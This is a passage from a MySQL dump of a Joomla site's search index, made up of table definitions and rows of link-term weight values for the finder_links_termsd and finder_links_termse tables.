,1646512,6.2668),(4850,1646512,6.2668),(4928,1646512,6.2668),(4951,1646512,6.2668),(4837,1646513,7.3332),(4850,1646513,7.3332),(4928,1646513,7.3332),(4951,1646513,7.3332),(4837,1646518,0.51331),(4837,1646519,1.05),(4839,1646590,1.09669),(4847,1646590,1.09669),(4857,1646590,1.09669),(4839,1646591,1.35331),(4847,1646591,1.35331),(4857,1646591,1.35331),(4839,1646600,0.88669),(4839,1646601,0.93331),(4847,1646858,1.8668),(4849,1647085,0.79331),(4849,1647086,1.02669),(4849,1647166,1.05),(4849,1647167,1.19),(4849,1647168,1.07331),(4849,1647169,1.21331),(4849,1647170,2.88),(4849,1647171,0.88669),(4849,1647172,2.26661),(4849,1647173,0.93331),(4849,1647174,1.09669),(4849,1647175,0.88669),(4849,1647176,1.16669),(4849,1647177,0.84),(4849,1647178,0.88669),(4849,1647179,0.86331),(4849,1647180,1.07331),(4849,1647181,0.91),(4849,1647182,1.02669),(4849,1647183,0.42),(4849,1647184,1.09669),(4849,1647185,1.23669),(4849,1647186,0.98),(4849,1647187,1.16669),(4849,1647188,0.37331),(4849,1647189,1.07331),(4849,1647190,1.35331),(4849,1647191,0.42),(4849,1647192,1.02669),(4849,1647193,1.21331),(4849,1647194,1.00331),(4849,1647195,1.16669),(4849,1647196,1.02669),(4849,1647197,1.14331),(4849,1647198,0.37331),(4849,1647199,0.98),(4849,1647200,1.09669),(4849,1647201,0.28),(4849,1647202,1.00331),(4849,1647203,1.16669),(4849,1647434,0.88669),(4849,1647435,1.05),(4850,1647947,5.6),(4850,1647952,3.00339),(4928,1647952,3.00339),(4951,1647952,3.00339),(4851,1647989,1.21331),(4852,1647989,1.21331),(4857,1648307,0.51331),(4857,1648308,1.14331),(4857,1648309,1.26),(4857,1648321,0.46669),(4857,1648322,1.12),(4857,1648323,1.16669),(4909,1672211,0.14),(4909,1672212,0.84),(4909,1672213,0.91),(4909,1672322,0.23331),(4909,1672323,0.86331),(4909,1672324,1.05),(4909,1672325,0.91),(4909,1672326,0.98),(4909,1672327,0.86331),(4909,1672328,1.00331),(4909,1672329,0.91),(4909,1672330,1.00331),(4909,1672331,0.91),(4909,1672332,1.12),(4909,1672333,1.00331),(4909,1672334,1.16669),(4909,1672335,0.98),(4909,1672336,1.16669),(4909,1672337,0.84),(4909,1672338,1.02669),(4909,1672339,0.42),(4909,1672340,1.19),(4909,1672341,1.4),(4909,1672342,1.14331),(4909,1672343,1.35331),(4917,1679145,0.93331),(4917,1679146,1.00331),(4917,1679147,1.05),(4917,1679148,0.95669),(4917,1679149,1.12),(4917,1679150,1.00331),(4917,1679151,1.35331),(4917,1679152,0.86331),(4917,1679153,1.16669),(4917,1679154,0.88669),(4917,1679155,1.23669),(4917,1679156,0.28),(4917,1679157,1.05),(4917,1679158,1.09669),(4917,1679159,0.28),(4917,1679160,1.05),(4917,1679161,1.19),(4917,1679162,0.32669),(4917,1679163,1.07331),(4917,1679164,1.12),(4917,1679165,0.42),(4917,1679166,0.98),(4917,1679167,1.30669),(4917,1679168,0.28),(4940,1679168,0.28),(4917,1679169,0.98),(4917,1679170,1.05),(4917,1679171,0.51331),(4940,1679171,0.51331),(4917,1679172,1.14331),(4917,1679173,1.33),(4917,1679174,0.42),(4917,1679175,0.95669),(4917,1679176,1.14331),(4917,1679177,0.32669),(4917,1679178,1.09669),(4917,1679179,1.30669),(4917,1679180,0.95669),(4917,1679181,1.05),(4917,1679372,0.84),(4917,1679373,1.12),(4917,1679374,0.98),(4917,1679375,1.14331),(4917,1679376,0.93331),(4917,1679377,1.16669),(4917,1679378,1.00331),(4917,1679379,1.26),(4917,1679380,0.42),(4917,1679381,1.19),(4917,1679382,1.35331),(4924,1680575,2.55),(4927,1682915,0.79331),(4927,1682916,1.05),(4927,1683014,0.91),(4927,1683015,0.98),(4927,1683016,0.91),(4927,1683017,1.14331),(4927,1683018,0.91),(4927,1683019,0.95669),(4927,1683020,1.12),(4927,1683021,1.23669),(4927,1683022,0.98),(4927,1683023,1.09669),(4927,1683024,0.98),(4927,1683025,1.21331),(4927,1683026,2.00662),(4927,1683027,1.07331),(4927,1683028,1.14331),(4927,1683029,0.88669),(4927,1683030,1.09669),(4927,1683031,1.26),(4927,1683032,1.09669),(4927,1683033,1.28331),(4927,1683034,1.19),(4927,1683035,1.30669),(4927,1683036,0.98),(4927,1683037,1.14331),(4927,1683038,0.46669),(4927,1683039,1.09669),(4927,1683040,1.35331),(4927,1683041,0.23331),(4927,1683042,1.05),(4927,1683043,1.09669),(4927,1683044,0.46669),(4927,1683045,1.21331),(4927,1683046,1.30669),(4927,1683047,0.23331),(4927,1683048,1.00331),(4927,1683049,1.12),(4927,1683248,0.91),(4927,1683249,0.95669),(4927,1683250,1.00331),(4927,1683251,1.16669),(4928,1683723,6.2668),(4929,1683773,2.21),(4929,1683774,2.49339),(4934,1683982,0.91),(4934,1683983,1.09669),(4934,1683984,0.69993),(4934,1683985,1.00331),(4934,1683986,1.14331),(4934,1683987,0.95669),(4934,1683988,1.09669),(4934,1683989,0.98),(4934,1683990,1.14331),(4934,1683991,1.4),(4934,1683992,1.36),(4934,1683993,2.83339),(4938,1686127,2.1332),(4938,1686128,5.6),(4938,1686129,7.0668),(4938,1686261,0.95669),(4938,1686262,1.07331),(4938,1686340,0.91),(4938,1686341,1.09669),(4938,1686342,0.98),(4938,1686343,1.14331),(4938,1686344,0.95669),(4940,1686344,0.95669),(4938,1686345,1.16669),(4940,1686345,1.16669),(4938,1686346,1.07331),(4938,1686347,1.35331),(4938,1686348,0.88669),(4938,1686349,1.19),(4938,1686350,0.42),(4938,1686351,1.16669),(4938,1686352,1.26),(4938,1686353,0.42),(4938,1686354,0.98),(4938,1686355,1.21331),(4938,1686356,0.42),(4938,1686357,1.07331),(4938,1686358,1.12),(4938,1686359,0.88669),(4938,1686360,1.07331),(4938,1686361,0.98),(4938,1686362,1.02669),(4938,1686363,1.12),(4938,1686364,1.28331),(4938,1686589,0.86331),(4938,1686590,1.02669),(4938,1686591,0.98),(4938,1686592,1.23669),(4938,1686593,0.98),(4938,1686594,1.33),(4938,1686595,0.46669),(4940,1686595,0.46669),(4938,1686596,1.07331),(4940,1686596,1.07331),(4938,1686597,1.14331),(4940,1686597,1.14331),(4940,1688183,1.88),(4940,1688184,5.2),(4940,1688185,6.5332),(4940,1688186,0.98),(4940,1688187,1.09669),(4940,1688440,0.14),(4940,1688441,1.00331),(4940,1688442,1.21331),(4940,1688443,1.02669),(4940,1688444,1.07331),(4940,1688445,0.91),(4940,1688446,1.05),(4940,1688447,0.95669),(4940,1688448,1.21331),(4940,1688449,1.14331),(4940,1688450,0.86331),(4940,1688451,1.00331),(4940,1688452,1.09669),(4940,1688453,1.35331),(4940,1688454,0.56),(4940,1688455,1.07331),(4940,1688456,1.35331),(4940,1688457,0.51331),(4940,1688458,1.09669),(4940,1688459,1.16669),(4940,1688460,1.02669),(4940,1688461,1.19),(4940,1688462,0.28),(4940,1688463,0.91),(4940,1688464,1.23669),(4940,1688465,0.42),(4940,1688466,1.16669),(4940,1688467,1.4),(4940,1688468,0.98),(4940,1688469,1.02669),(4940,1688470,2.32339),(4940,1688471,2.89),(4940,1688472,0.37331),(4940,1688473,1.05),(4940,1688474,1.30669),(4940,1688475,0.42),(4940,1688476,1.19),(4940,1688477,1.26),(4940,1688478,0.46669),(4940,1688479,1.00331),(4940,1688480,1.21331),(4940,1688481,0.28),(4940,1688482,0.95669),(4940,1688483,1.09669),(4940,1688703,0.91),(4940,1688704,0.98),(4940,1688705,0.86331),(4940,1688706,0.91),(4940,1688707,2.21),(4940,1688708,2.49339),(4940,1688709,0.81669),(4940,1688710,1.02669),(4940,1688711,1.02669),(4940,1688712,1.21331),(4940,1688713,1.05),(4940,1688714,1.33),(4945,1689251,1.13339),(4945,1689252,2.60661),(4948,1689320,2.28),(4951,1689382,6),(4953,1689421,0.34),(4953,1689422,2.32339),(4953,1689423,0.45339),(4953,1689424,2.15339),(4953,1689425,2.60661),(4954,1689450,2.32339),(4955,1689479,1.14331),(4955,1689480,1.19);
/*!40000 ALTER TABLE `fw3gt_finder_links_termsd` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_termse`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_termse`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_termse` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_termse`
--

LOCK TABLES `fw3gt_finder_links_termse` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_termse` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_termse` VALUES (4574,1523608,0.2666),(4591,1523608,0.2666),(4593,1523608,0.2666),(4635,1523608,0.2666),(4653,1523608,0.2666),(4721,1523608,0.2666),(4723,1523608,0.2666),(4764,1523608,0.2666),(4809,1523608,0.2666),(4723,1523609,2.4),(4764,1523609,2.4),(4723,1523610,2.6),(4764,1523610,2.6),(4571,1523635,0.09331),(4572,1523635,0.09331),(4604,1523635,0.09331),(4616,1523635,0.09331),(4617,1523635,0.09331),(4625,1523635,0.09331),(4626,1523635,0.09331),(4661,1523635,0.09331),(4669,1523635,0.09331),(4693,1523635,0.09331),(4710,1523635,0.09331),(4736,1523635,0.09331),(4741,1523635,0.09331),(4777,1523635,0.09331),(4780,1523635,0.09331),(4852,1523635,0.09331),(4569,1523635,0.18662),(4608,1523635,0.18662),(4798,1523635,0.18662),(4909,1523635,0.18662),(4594,1523635,0.22661),(4735,1523635,0.22661),(4723,1523635,0.31992),(4764,1523635,0.31992),(4837,1523635,0.31992),(4850,1523635,0.31992),(4928,1523635,0.31992),(4951,1523635,0.31992),(4653,1523635,0.45322),(4761,1523635,0.46655),(4917,1523635,0.55986),(4938,1523635,0.55986),(4849,1523635,0.83979),(4940,1523635,0.87978),(4721,1523635,0.9331),(4723,1523638,0.91),(4764,1523638,0.91),(4780,1523638,0.91),(4837,1523638,0.91),(4850,1523638,0.91),(4928,1523638,0.91),(4951,1523638,0.91),(4653,1523638,2.21),(4723,1523639,1.21331),(4837,1523639,1.21331),(4850,1523639,1.21331),(4723,1523650,0.79339),(4764,1523650,0.79339),(4723,1523651,2.26661),(4764,1523651,2.26661),(4723,1523652,2.49339),(4764,1523652,2.49339),(4572,1523653,0.18669),(4608,1523653,0.18669),(4658,1523653,0.18669),(4661,1523653,0.18669),(4669,1523653,0.18669),(4741,1523653,0.18669),(4749,1523653,0.18669),(4839,1523653,0.18669),(4851,1523653,0.18669),(4710,1523653,0.37338),(4852,1523653,0.37338),(4917,1523653,0.37338),(4653,1523653,0.45339),(4723,1523653,0.45339),(4735,1523653,0.45339),(4736,1523653,0.45339),(4753,1523653,0.45339),(4764,1523653,0.45339),(4780,1523653,0.45339),(4799,1523653,0.45339),(4806,1523653,0.45339),(4837,1523653,0.45339),(4850,1523653,0.45339),(4928,1523653,0.45339),(4929,1523653,0.45339),(4940,1523653,0.74676),(4814,1523653,0.90678),(4938,1523653,2.77368),(4538,1523796,0.4),(4538,1523797,2.3334),(4658,1523804,0.46662),(4538,1523804,0.56661),(4539,1523822,0.4),(4539,1523823,2.3334),(4539,1523824,0.4),(4761,1523837,0.28),(4540,1523837,0.4),(4678,1523837,0.74),(4540,1523838,2.3334),(4569,1524807,0.86331),(4569,1524808,0.95669),(4569,1524809,1.00331),(4669,1524809,1.00331),(4693,1524809,1.00331),(4741,1524809,1.00331),(4940,1524809,1.00331),(4569,1524810,1.12),(4571,1524982,1.02669),(4572,1524982,1.02669),(4661,1524982,1.02669),(4571,1524983,1.16669),(4572,1524983,1.16669),(4661,1524983,1.16669),(4572,1525028,0.84),(4661,1525028,0.84),(4669,1525028,0.84),(4741,1525028,0.84),(4572,1525029,1.09669),(4661,1525029,1.09669),(4669,1525029,1.09669),(4741,1525029,1.09669),(4574,1525108,2.6),(4574,1525109,3.0666),(4591,1527330,2.5334),(4593,1527373,2.6),(4593,1527374,3.4),(4593,1527391,0.45339),(4593,1527392,2.32339),(4593,1527393,2.94661),(4593,1527405,1.24661),(4593,1527406,2.77661),(4593,1527407,3.11661),(4594,1527481,0.07),(4608,1527481,0.07),(4614,1527481,0.07),(4616,1527481,0.07),(4909,1527481,0.07),(4927,1527481,0.07),(4938,1527481,0.07),(4762,1527481,0.14),(4837,1527481,0.17),(4658,1527481,0.21),(4732,1527481,0.35),(4806,1527481,0.37),(4761,1527481,0.56),(4626,1527481,0.63),(4594,1527482,0.79331),(4594,1527483,0.86331),(4594,1527484,0.14),(4604,1527484,0.14),(4617,1527484,0.14),(4626,1527484,0.14),(4608,1527484,0.28),(4624,1527484,0.28),(4909,1527484,0.28),(4594,1527485,0.81669),(4594,1527558,2.15339),(4594,1527559,0.46669),(4594,1527560,1.16669),(4594,1527561,1.37669),(4594,1527633,0.51331),(4594,1527634,1.02669),(4594,1527635,1.09669),(4594,1527636,0.23331),(4710,1527636,0.23331),(4749,1527636,0.23331),(4851,1527636,0.23331),(4935,1527636,0.56661),(4734,1527636,0.93324),(4594,1527637,0.98),(4594,1527638,1.19),(4604,1528817,0.35),(4608,1528817,0.35),(4614,1528817,0.35),(4617,1528817,0.35),(4625,1528817,0.35),(4604,1528818,1.00331),(4608,1528818,1.00331),(4614,1528818,1.00331),(4617,1528818,1.00331),(4625,1528818,1.00331),(4604,1528819,1.05),(4608,1528819,1.05),(4614,1528819,1.05),(4617,1528819,1.05),(4625,1528819,1.05),(4604,1528830,0.81669),(4624,1528830,0.81669),(4608,1528830,1.63338),(4604,1529024,0.04669),(4624,1529024,0.04669),(4625,1529024,0.04669),(4762,1529024,0.04669),(4803,1529024,0.04669),(4909,1529024,0.04669),(4927,1529024,0.04669),(4608,1529024,0.09338),(4616,1529024,0.09338),(4617,1529024,0.09338),(4957,1529024,0.11339),(4770,1529024,0.11339),(4929,1529024,0.11339),(4710,1529024,0.14007),(4777,1529024,0.14007),(4626,1529024,0.18676),(4761,1529024,0.18676),(4940,1529024,0.18676),(4934,1529024,0.20677),(4938,1529024,0.23345),(4917,1529024,0.28014),(4614,1529024,0.32683),(4721,1529024,0.32683),(4734,1529024,0.32683),(4608,1529051,0.60669),(4617,1529051,0.60669),(4604,1529051,1.21338),(4625,1529051,2.42676),(4626,1529051,2.42676),(4614,1529054,0.56),(4625,1529054,0.56),(4604,1529054,1.12),(4608,1529054,1.12),(4617,1529054,1.68),(4616,1529054,1.92),(4626,1529054,2.8),(4604,1529057,1.02669),(4608,1529057,1.02669),(4617,1529057,1.02669),(4626,1529057,1.02669),(4604,1529058,1.33),(4608,1529058,1.33),(4617,1529058,1.33),(4626,1529058,1.33),(4604,1529342,0.23331),(4608,1529342,0.23331),(4614,1529342,0.23331),(4616,1529342,0.23331),(4617,1529342,0.23331),(4625,1529342,0.23331),(4604,1529343,0.91),(4608,1529343,0.91),(4614,1529343,0.91),(4617,1529343,0.91),(4625,1529343,0.91),(4604,1529344,1.14331),(4608,1529344,1.14331),(4614,1529344,1.14331),(4617,1529344,1.14331),(4625,1529344,1.14331),(4604,1535935,0.07),(4617,1535935,0.07),(4625,1535935,0.07),(4927,1535935,0.07),(4938,1535935,0.07),(4614,1535935,0.14),(4626,1535935,0.14),(4616,1535935,0.21),(4798,1535935,0.21),(4732,1535935,0.28),(4761,1535935,0.28),(4762,1535935,0.28),(4658,1535935,0.35),(4850,1535935,0.57),(4604,1535936,0.79331),(4616,1535936,0.79331),(4617,1535936,0.79331),(4625,1535936,0.79331),(4604,1535937,0.86331),(4616,1535937,0.86331),(4617,1535937,0.86331),(4625,1535937,0.86331),(4604,1535938,0.21),(4604,1535939,0.86331),(4604,1535940,1.19),(4604,1535956,0.04669),(4604,1535957,0.84),(4604,1535958,1.09669),(4604,1535959,0.32669),(4604,1535960,0.95669),(4604,1535961,1.21331),(4604,1536039,0.04669),(4604,1536040,0.93331),(4604,1536041,1.12),(4604,1536042,0.8),(4604,1536043,3.2),(4604,1536044,3.8),(4604,1536045,0.51331),(4616,1536045,0.51331),(4624,1536045,0.51331),(4604,1536046,1.16669),(4604,1536047,1.21331),(4604,1536190,0.86331),(4604,1536191,1.07331),(4604,1536192,1.02669),(4617,1536192,1.02669),(4625,1536192,1.02669),(4604,1536193,1.12),(4617,1536193,1.12),(4625,1536193,1.12),(4604,1536194,0.32669),(4614,1536194,0.32669),(4604,1536195,1.05),(4604,1536196,1.09669),(4604,1536197,0.32669),(4614,1536197,0.32669),(4604,1536198,1.00331),(4604,1536199,1.05),(4604,1536200,1.05),(4604,1536201,1.14331),(4604,1536202,1.30669),(4604,1536203,1.4),(4604,1536204,1.07331),(4616,1536204,1.07331),(4604,1536205,1.37669),(4604,1536206,0.46669),(4616,1536206,0.46669),(4617,1536206,0.46669),(4626,1536206,0.93338),(4604,1536207,1.05),(4616,1536207,1.05),(4617,1536207,1.05),(4626,1536207,1.05),(4604,1536208,1.19),(4617,1536208,1.19),(4626,1536208,1.19),(4604,1536209,0.46669),(4604,1536210,1.33),(4604,1536211,1.4),(4604,1536333,0.37331),(4625,1536333,0.37331),(4604,1536334,1.07331),(4604,1536335,1.4),(4604,1536336,0.37331),(4626,1536336,1.86655),(4604,1536337,1.19),(4604,1536338,1.26),(4604,1536339,0.37331),(4604,1536340,1.14331),(4604,1536341,1.23669),(4604,1536342,0.18669),(4625,1536342,0.18669),(4626,1536342,0.18669),(4604,1536343,0.88669),(4604,1536344,1.19),(4608,1540056,0.84),(4608,1540057,0.91),(4624,1540058,0.14),(4625,1540058,0.14),(4940,1540058,0.14),(4608,1540058,0.28),(4917,1540058,0.28),(4938,1540058,1.42),(4608,1540059,0.79331),(4624,1540059,0.79331),(4608,1540060,0.84),(4608,1540061,0.79331),(4608,1540062,0.93331),(4608,1540063,0.35),(4608,1540064,0.98),(4608,1540065,1.09669),(4608,1540076,2.00662),(4608,1540077,0.21),(4625,1540077,0.21),(4626,1540077,0.21),(4608,1540078,0.84),(4626,1540078,0.84),(4608,1540079,1.02669),(4608,1540080,0.21),(4608,1540081,0.84),(4608,1540082,1.09669),(4608,1540249,0.81669),(4614,1540249,0.81669),(4608,1540250,1.12),(4614,1540250,1.12),(4608,1540251,1.02669),(4608,1540252,1.19),(4608,1540253,1.77338),(4608,1540254,2.47338),(4608,1540255,0.74662),(4608,1540256,0.93331),(4608,1540257,1.05),(4608,1540258,0.95669),(4608,1540259,1.00331),(4608,1540260,0.28),(4608,1540261,0.95669),(4608,1540262,1.02669),(4608,1540263,0.23331),(4608,1540264,1.02669),(4608,1540265,1.09669),(4608,1540266,0.28),(4608,1540267,1.05),(4608,1540268,1.19),(4608,1540269,0.84),(4608,1540270,2.24),(4608,1540271,2.61338),(4608,1540272,0.37331),(4608,1540273,0.93331),(4608,1540274,1.14331),(4608,1540275,1.09669),(4608,1540276,1.4),(4608,1540277,1.30669),(4608,1540278,1.4),(4608,1540279,0.42),(4608,1540280,1.16669),(4608,1540281,1.37669),(4608,1540282,0.46669),(4614,1540282,0.46669),(4625,1540282,0.46669),(4608,1540283,0.98),(4614,1540283,0.98),(4608,1540284,1.14331),(4614,1540284,1.14331),(4608,1540285,0.46669),(4608,1540286,1.14331),(4608,1540287,1.19),(4608,1540288,0.51331),(4608,1540289,1.16669),(4608,1540290,1.35331),(4608,1540291,0.32669),(4608,1540292,0.91),(4608,1540293,1.02669),(4608,1540529,0.37338),(4608,1540530,1.72662),(4608,1540531,2.1),(4608,1540532,0.7),(4608,1540533,1.30669),(4608,1540534,1.4),(4608,1540535,0.60669),(4608,1540536,1.33),(4608,1540537,1.4),(4614,1540538,0.32669),(4608,1540538,1.30676),(4608,1540539,1.82),(4608,1540540,2.24),(4608,1540541,1.07331),(4608,1540542,1.4),(4608,1540543,1.09669),(4608,1540544,1.4),(4608,1540545,0.46669),(4608,1540546,0.98),(4608,1540547,1.14331),(4614,1540548,0.37331),(4734,1540548,0.37331),(4608,1540548,0.74662),(4608,1540549,2.1),(4608,1540550,2.24),(4608,1540551,1.28331),(4608,1540552,1.4),(4614,1546194,0.77),(4614,1546195,0.84),(4614,1546196,0.21),(4614,1546197,0.88669),(4614,1546198,0.93331),(4614,1546199,0.14),(4761,1546199,0.14),(4614,1546200,0.81669),(4614,1546201,1.00331),(4614,1546207,0.79331),(4614,1546208,0.84),(4614,1546209,0.91),(4614,1546210,1.14331),(4626,1546211,0.28),(4614,1546211,0.56),(4614,1546212,0.84),(4614,1546213,0.91),(4614,1546214,0.91),(4614,1546215,1.26),(4614,1546216,0.28),(4614,1546217,0.86331),(4614,1546218,1.05),(4614,1546515,2.66007),(4614,1546516,1.02669),(4614,1546517,0.95669),(4614,1546518,0.93331),(4614,1546519,1.00331),(4614,1546520,1.21331),(4614,1546521,0.88669),(4614,1546522,1.02669),(4614,1546523,1.07331),(4614,1546524,1.21331),(4614,1546525,0.46669),(4614,1546526,1.12),(4614,1546527,1.23669),(4614,1546528,1.05),(4614,1546529,1.26),(4614,1546530,0.7),(4614,1546531,1.26),(4614,1546532,1.35331),(4614,1546533,0.51331),(4614,1546534,1.02669),(4614,1546535,1.37669),(4614,1546536,0.46669),(4614,1546537,1.07331),(4614,1546538,1.33),(4614,1546539,0.28),(4614,1546540,0.93331),(4614,1546541,1.16669),(4614,1546542,0.93331),(4614,1546543,1.23669),(4614,1546544,0.60669),(4614,1546545,1.16669),(4614,1546546,1.4),(4614,1546547,0.56),(4616,1546547,0.56),(4617,1546547,0.56),(4625,1546547,0.56),(4626,1546547,0.56),(4614,1546548,1.05),(4616,1546548,1.05),(4617,1546548,1.05),(4614,1546549,1.26),(4614,1546550,0.56),(4617,1546550,1.12),(4614,1546551,1.07331),(4617,1546551,1.07331),(4614,1546552,1.37669),(4614,1546553,1.21331),(4614,1546554,1.4),(4614,1546555,0.60669),(4616,1546555,0.60669),(4626,1546555,0.60669),(4614,1546556,1.28331),(4614,1546557,1.4),(4614,1546558,0.46669),(4614,1546559,1.19),(4614,1546560,1.4),(4614,1546561,0.37331),(4777,1546561,0.74662),(4614,1546562,1.05),(4614,1546563,1.19),(4614,1546564,0.37331),(4614,1546565,1.05),(4614,1546566,1.12),(4614,1546567,0.28),(4614,1546568,0.98),(4614,1546569,1.21331),(4614,1546570,0.42),(4614,1546571,1.14331),(4614,1546572,1.37669),(4614,1546573,0.42),(4614,1546574,1.12),(4614,1546575,1.35331),(4614,1546901,0.23331),(4614,1546902,0.91),(4614,1546903,1.14331),(4614,1546904,0.32669),(4614,1546905,1.12),(4614,1546906,1.21331),(4614,1546907,0.32669),(4614,1546908,1.05),(4614,1546909,1.37669),(4614,1546910,0.65331),(4614,1546911,1.26),(4614,1546912,1.33),(4614,1546913,0.32669),(4614,1546914,0.93331),(4614,1546915,1.02669),(4614,1546916,1.12),(4614,1546917,1.30669),(4614,1546918,0.46669),(4614,1546919,1.05),(4614,1546920,1.12),(4614,1546921,1.12),(4614,1546922,1.19),(4626,1546923,0.28),(4614,1546923,1.12),(4614,1546924,1.02669),(4614,1546925,1.21331),(4614,1546926,1.21331),(4614,1546927,1.4),(4614,1546928,1.07331),(4614,1546929,1.28331),(4614,1546930,1.05),(4614,1546931,1.16669),(4614,1546932,0.56),(4614,1546933,1.02669),(4614,1546934,1.14331),(4614,1546935,0.93338),(4614,1546936,1.19),(4614,1546937,1.23669),(4614,1546938,0.98),(4614,1546939,1.09669),(4614,1546940,0.18669),(4614,1546941,1.12),(4614,1546942,1.16669),(4614,1546943,0.23331),(4614,1546944,0.86331),(4614,1546945,1.19),(4616,1547692,0.84),(4616,1547693,0.93331),(4616,1547694,0.35),(4616,1547697,0.77),(4616,1547698,0.81669),(4616,1547699,0.84),(4616,1547700,0.91),(4616,1547701,0.21),(4616,1547702,0.88669),(4616,1547703,0.98),(4616,1547723,0.46669),(4616,1547724,1.05),(4616,1547725,1.28331),(4616,1547726,0.32669),(4616,1547727,1.19),(4616,1547728,1.4),(4616,1547749,1.4666),(4616,1547750,3.8666),(4616,1547751,4),(4616,1547752,1.16669),(4616,1547753,1.37669),(4616,1547861,0.95669),(4616,1547862,1.14331),(4616,1547863,0.84),(4616,1547864,1.21331),(4616,1547865,1.09669),(4616,1547866,1.14331),(4616,1547867,0.32669),(4616,1547868,1.09669),(4616,1547869,1.28331),(4616,1547870,1.4),(4616,1547871,1.30669),(4616,1547872,1.23669),(4616,1547873,1.4),(4616,1547874,0.42),(4616,1547875,1.14331),(4616,1547876,1.28331),(4616,1547877,1.19),(4616,1547968,1.00331),(4616,1547969,1.14331),(4616,1547970,0.42),(4616,1547971,0.95669),(4616,1547972,1.07331),(4616,1547973,0.18669),(4616,1547974,0.98),(4616,1547975,1.05),(4617,1548211,0.95669),(4617,1548212,1.21331),(4617,1548311,0.86331),(4940,1548311,0.86331),(4617,1548312,1.16669),(4617,1548313,1.00331),(4617,1548314,1.33),(4617,1548315,1.37669),(4617,1548316,1.26),(4617,1548317,1.4),(4617,1548318,1.30669),(4617,1548319,1.23669),(4617,1548320,1.4),(4617,1548321,1.19),(4617,1548322,1.4),(4617,1548323,1.12),(4617,1548324,1.30669),(4617,1548325,0.46669),(4617,1548326,1.05),(4617,1548327,1.14331),(4617,1548328,0.37331),(4617,1548329,1.19),(4617,1548330,1.23669),(4617,1548331,0.42),(4617,1548332,1.09669),(4617,1548333,1.4),(4617,1548421,0.65331),(4625,1548421,0.65331),(4617,1548422,1.21331),(4617,1548423,1.4),(4617,1548424,0.28),(4617,1548425,1.23669),(4617,1548426,1.37669),(4617,1548427,0.37331),(4617,1548428,1.09669),(4617,1548429,1.4),(4624,1553873,1.02669),(4624,1553874,0.60669),(4624,1553875,1.33),(4624,1553876,1.4),(4624,1553877,0.60669),(4624,1553878,1.33),(4624,1553879,1.4),(4624,1553880,0.7),(4624,1553881,1.28331),(4624,1553882,1.4),(4624,1553883,0.79331),(4624,1553884,0.88669),(4624,1553885,0.88669),(4624,1553886,0.42),(4624,1553887,1.02669),(4624,1553888,1.12),(4624,1553918,0.42),(4624,1553919,1.19),(4624,1553920,1.4),(4624,1553921,0.51331),(4624,1553922,1.05),(4624,1553923,1.33),(4624,1553978,0.7),(4624,1553979,1.35331),(4624,1553980,1.4),(4624,1553981,1.19),(4624,1553982,1.4),(4624,1554163,0.84),(4624,1554164,1.00331),(4624,1554165,0.23331),(4624,1554166,0.88669),(4624,1554167,1.02669),(4624,1554168,0.42),(4624,1554169,1.14331),(4624,1554170,1.19),(4624,1554171,0.51331),(4624,1554172,1.00331),(4624,1554173,1.33),(4624,1554394,0.18669),(4798,1554394,0.93345),(4624,1554395,0.95669),(4624,1554396,1.07331),(4798,1554397,0.32669),(4624,1554397,0.65338),(4624,1554398,0.98),(4624,1554399,1.05),(4624,1554400,0.98),(4624,1554401,1.05),(4624,1554402,1.21338),(4624,1554403,2.1),(4624,1554404,2.24),(4624,1554405,0.32669),(4624,1554406,0.93331),(4624,1554407,1.23669),(4625,1554869,0.84),(4625,1554870,1.14331),(4625,1554872,0.81669),(4625,1554873,0.86331),(4625,1555060,0.86331),(4625,1555061,1.00331),(4625,1555062,0.37331),(4625,1555063,1.07331),(4625,1555064,1.28331),(4625,1555065,0.46669),(4625,1555066,1.12),(4625,1555067,1.26),(4625,1555068,0.46669),(4625,1555069,1.16669),(4625,1555070,1.4),(4625,1555071,1.23669),(4625,1555072,1.4),(4625,1555073,1.23669),(4625,1555074,1.4),(4625,1555075,1.09669),(4625,1555076,1.19),(4625,1555077,1.16669),(4625,1555078,1.35331),(4625,1555079,1.16669),(4625,1555080,1.23669),(4625,1555081,1.21331),(4625,1555082,1.26),(4625,1555083,1.05),(4625,1555084,1.19),(4625,1555085,0.46669),(4625,1555086,1.00331),(4625,1555087,1.16669),(4625,1555088,0.42),(4625,1555089,1.16669),(4625,1555090,1.37669),(4625,1555372,0.18669),(4940,1555372,0.18669),(4734,1555372,0.37338),(4625,1555373,1.09669),(4625,1555374,1.33),(4625,1555375,1.19),(4625,1555376,1.4),(4625,1555377,1.12),(4625,1555378,1.37669),(4625,1555379,0.37331),(4626,1555379,0.37331),(4625,1555380,1.14331),(4625,1555381,1.4),(4625,1555382,1.00331),(4625,1555383,1.21331),(4625,1555384,0.18669),(4927,1555384,0.18669),(4625,1555385,0.84),(4625,1555386,0.98),(4626,1555933,1.09669),(4626,1555934,1.4),(4626,1555935,0.81669),(4626,1555936,0.88669),(4626,1555937,2.73),(4626,1555938,1.05),(4626,1555939,2.28662),(4626,1555940,0.91),(4626,1555941,1.05),(4626,1555942,0.88669),(4626,1555943,1.02669),(4626,1555944,0.98),(4626,1555945,1.21331),(4626,1555946,0.88669),(4626,1555947,1.07331),(4626,1555948,0.21),(4626,1555949,0.86331),(4626,1555950,1.00331),(4626,1555954,0.81669),(4626,1555955,1.02669),(4626,1555956,0.77),(4626,1555957,0.84),(4626,1555958,0.86331),(4626,1555959,1.02669),(4626,1555960,0.21),(4626,1555961,0.86331),(4626,1555962,1.12),(4626,1555963,0.79331),(4626,1555964,0.88669),(4626,1555965,0.84),(4626,1555966,1.82),(4626,1555967,1.16669),(4626,1555968,1.16669),(4626,1555969,1.07331),(4626,1555970,0.56),(4626,1555971,0.95669),(4626,1555972,1.19),(4626,1556318,0.88669),(4734,1556318,0.88669),(4626,1556319,1.16669),(4626,1556320,0.95669),(4626,1556321,1.16669),(4626,1556